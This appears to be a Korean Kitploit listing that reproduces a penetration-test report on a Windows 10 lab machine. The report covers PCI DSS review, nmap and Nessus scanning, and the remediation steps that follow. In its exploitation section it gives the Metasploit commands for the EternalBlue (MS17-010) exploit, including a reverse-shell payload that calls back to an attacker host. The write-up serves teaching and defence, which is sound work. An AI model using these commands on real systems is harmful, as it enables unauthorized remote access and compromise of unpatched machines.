Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint — 이 보고서는 금융 중심 인프라 내 Windows 10 머신에서 PCI DSS 규정 준수, SMB 서비스 열거, CVE-2017-0144(EternalBlue) 악용에 초점을 맞춘 구조화된 VAPT 수행 내용을 설명합니다. | Kitploit
도구/GitHubGitHub/adityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint
ReconnaissanceVulnerability AnalysisExploitationNetwork SecurityPenetration TestingLearning & Education
GitHubadityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint

VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint

이 보고서는 금융 중심 인프라 내 Windows 10 머신에서 PCI DSS 규정 준수, SMB 서비스 열거, CVE-2017-0144(EternalBlue) 악용에 초점을 맞춘 구조화된 VAPT 수행 내용을 설명합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1511년 전아직 검토되지 않음

Windows 10 금융 엔드포인트의 SMB 익스플로잇에 관한 VAPT 보고서

이 보고서는 금융 지향 인프라 내 Windows 10 시스템에서 PCI DSS 규정 준수, SMB 서비스 열거 및 CVE-2017-0144 (EternalBlue) 익스플로잇에 초점을 맞춘 구조화된 VAPT 수행을 설명합니다.


🔐 소개

금융 기관은 사이버보안 분야에서 가장 엄격한 규정 준수 요구 사항 중 일부에 직면합니다. 민감한 고객 데이터와 카드 소지자 정보가 위험에 처해 있기 때문에 보안 구성 오류는 치명적인 침해로 이어질 수 있습니다. 이 VAPT 시뮬레이션은 PCI DSS 규정 준수 관점에서 Windows 10 기반 엔드포인트 시스템의 보안 태세를 평가하고, 노출된 SMB 서비스의 알려진 취약점을 식별 및 익스플로잇하기 위해 수행되었습니다.

시뮬레이션은 Nessus를 사용한 정찰 및 취약점 스캐닝부터 Metasploit을 통한 실제 익스플로잇까지 여러 단계를 포함합니다. 보고서는 금융 네트워크의 무결성을 유지하는 데 있어 엔드포인트 강화, 패치 관리, 방화벽 시행 및 PCI DSS 정렬의 중요성을 더욱 강조합니다.

Aditya Bhatt


취약점 평가 및 침투 테스트 (VAPT) 보고서

대상: Windows 10 호스트 – 금융 부문 엔드포인트

작성자: Aditya Bhatt
직위: VAPT 분석가 | 사이버보안 전문가
연락처: [email protected] | +91-9818993884


요약

이 보고서는 금융 데이터 및 신용 카드 거래를 처리할 것으로 의심되는 Windows 10 엔드포인트에 수행된 침투 테스트 결과를 제시합니다. 목표는 PCI DSS 제어 구현을 검증하고 카드 소지자 데이터를 손상시킬 수 있는 잠재적 공격 벡터를 식별하는 것이었습니다.

Nessus를 사용하여 호스트가 CVE-2017-0144 (EternalBlue) – 중요한 SMB 취약점 – 에 취약한 것으로 발견되었습니다. 그런 다음 Metasploit 프레임워크를 사용하여 이 결함을 익스플로잇하고 무단 원격 셀 액세스를 획득했습니다. 이 보고서는 금융 시스템의 데이터 침해를 방지하기 위해 적시에 패치를 관리하고 네트워크 서비스를 강화하는 것의 중요성을 강조합니다.


목표

  • 대상 엔드포인트의 PCI DSS 요구 사항 준수 평가
  • Windows 10 시스템의 취약점 열거 및 식별
  • 표준 도구와 기술을 사용하여 발견된 취약점 익스플로잇
  • 시스템 보안 및 규정 준수 개선을 위한 수정 조치 권장

방법론

작업 1: PCI DSS 규정 준수 평가

PCI DSS의 6가지 주요 목표와 12가지 요구 사항이 검토되었습니다. 주요 원칙은 다음과 같습니다.

  • 방화벽 구현 및 공급업체 기본값 변경
  • 저장 및 전송 중 카드 소지자 데이터 암호화
  • 안티바이러스, 안전한 구성 및 패치 관리 사용
  • 액세스 제어 및 인증 메커니즘 시행
  • 모니터링, 로깅 및 정기적인 취약점 스캔 수행
  • 조직 전체 보안 정책 수립 및 시행

작업 2: 취약점 발견

대상 시스템:

  • Windows 10 VM
  • IP 주소: 10.10.195.105
  • 서브넷: 255.0.0.0

사용된 도구:

  • Nmap – 포트 및 서비스 검색
  • Nessus – 취약점 스캐닝
  • Metasploit – 익스플로잇

주요 명령어:

root@kitploit:~
nmap -sn 10.10.195.105

5

root@kitploit:~
nmap -sV -p445 10.10.195.105

6

root@kitploit:~
nmap -F 10.10.195.105

1

  • 포트 445 (SMB)가 열려 있음 발견
  • Nessus가 취약점 식별: CVE-2017-0144 (EternalBlue)

2 png
3
4


작업 3: 익스플로잇

스캐너:

Nessus 스캔 시도:

7
8
9
10
11
12
13
14
15

Metasploit 스캔 시도:

root@kitploit:~
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run

16
17

익스플로잇 모듈:

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit

18
19
20

  • 결과: 대상 Windows 10 시스템에서 원격 셀 성공적으로 열림
  • 민감한 시스템에 대한 무단 접근 확인됨

주요 발견 사항

  • SMBv1 활성화 및 네트워크에 노출됨
  • EternalBlue (MS17-010) 패치되지 않음 및 익스플로잇 가능
  • Nessus 스캔에서 여러 높은 심각도 취약점 발견
  • 수평 이동을 방지하는 방화벽 또는 네트워크 세분화 없음
  • 기본 네트워크 서비스가 불필요하게 열려 있음

위험 분석


권장 사항

  1. 패치 관리

    • CVE-2017-0144에 대한 Microsoft 보안 업데이트 즉시 적용
    • 지속적인 취약점 스캔 및 패치 주기 구현
  2. 네트워크 강화

    • SMBv1 프로토콜 완전히 비활성화
    • SMB 서비스 액세스를 내부 신뢰할 수 있는 네트워크로만 제한
  3. 방화벽 시행

    • 공용 인터페이스에서 포트 445 차단
    • IPS/IDS를 사용하여 실시간으로 SMB 기반 공격 탐지
  4. 지속적인 모니터링

    • SIEM 도구를 배포하여 이상 징후 탐지 및 이벤트 상관 분석
    • 새로운 위험을 평가하기 위해 정기적인 Nessus 스캔 예약
  5. PCI DSS 준수

    • 다중 요소 인증 및 최소 권한 액세스 시행
    • 모든 카드 소지자 데이터를 전송 중 및 저장 중 암호화
    • 전체 제어 범위를 보장하기 위해 정기적인 감사 수행
  6. 인식 교육

    • IT 팀 및 이해 관계자를 위한 정기적인 교육 세션 실시
    • 금융 데이터의 안전한 처리 및 취약점 대응 절차 포함

결론

이 수행은 SMBv1과 같은 패치되지 않고 오래된 서비스가 공개적으로 알려진 익스플로잇을 사용하여 완전한 시스템 손상으로 이어질 수 있음을 명확히 입증했습니다. 여기서 익스플로잇된 EternalBlue 취약점은 금융 인프라에서 적시 패치, 서비스 최소화 및 사전 예방적 스캐닝이 불가피한 이유를 보여주는 전형적인 예입니다.

PCI DSS와 같은 프레임워크에 대한 규정 준수 없이 조직은 법적 처벌과 치명적인 데이터 침해 모두의 위험을 감수합니다.


🛡️ 마지막 생각

보안 격차는 종종 레거시 프로토콜과 잊혀진 패치 뒤에 숨어 있습니다. 이 수행은 특히 SMB와 같은 모든 서비스를 편의가 아닌 위험 표면으로 취급하는 것의 중요성을 재확인했습니다.

금융 부문의 강력한 사이버보안은 지속적인 경계, 시행된 정책 및 타협 없는 패치 관리에서 시작됩니다.

보고서를 읽어주셔서 감사합니다. 이 보고서가 명확성과 실질적인 통찰력을 제공하고, 특히 금융 데이터를 처리할 때 지속적인 보안 검증이 왜 필수적인지 강화하는 데 도움이 되었기를 바랍니다.

– Aditya Bhatt
VAPT 분석가 | 사이버보안 전문가

도구 다운로드
위험 설명영향가능성위험 점수
EternalBlue 익스플로잇 (SMBv1)높음높음심각
패치 관리 부족높음중간높음
네트워크 액세스 제어 부재중간높음높음
PCI DSS 미준수높음높음심각